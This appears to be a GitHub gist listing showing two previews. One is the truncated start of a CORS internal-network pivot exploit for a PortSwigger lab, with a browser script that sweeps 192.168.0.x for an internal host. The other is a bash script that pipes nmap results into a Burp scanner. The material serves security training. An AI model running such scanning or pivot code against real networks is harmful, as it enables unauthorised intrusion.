Dominique RIGHETTO righettod
👨💻
ChrisPritchard
/ cors-pivot-exploit.html
Last active
November 25, 2022 04:48
exploit server content for this lab: https://portswigger.net/web-security/cors/lab-internal-network-pivot-attack
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!-- each script tag below is a seperate exploit page to use on the server, for this multi-step lab --> | |
| <!-- technically only the first (to find the ip) and last (to execute the delete) are needed, but the | |
| middle two scripts were used by me to explore the site and craft the final exploit --> | |
| <!-- find the ip address of the internal endpoint --> | |
| <script> | |
| for(var i = 1; i <= 254; i++) { | |
| var req = new XMLHttpRequest(); | |
| req.open('get', 'http://192.168.0.' + i + ':8080/', true); | |
| req.onload = report(i); |
jgamblin
/ nmapburp.sh
Created
September 6, 2018 19:49
NMap a network and send all open web servers to Burp.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Script to Scan All Sites Found With A Simple NMAP Scan With Burp. | |
| sites=$(nmap "$1" --open 443 --resolve-all --open -oG - | awk 'NR!=1 && /open/{print $2}') | |
| for site in $sites | |
| do | |
| curl -vgw "\\n" 'http://127.0.0.1:1337/v0.1/scan' -d '{"urls":["'"$site"'"]}' > /dev/null 2>&1 | |
| printf "Scanning %s with burp.\\n" "$site" | |
| done |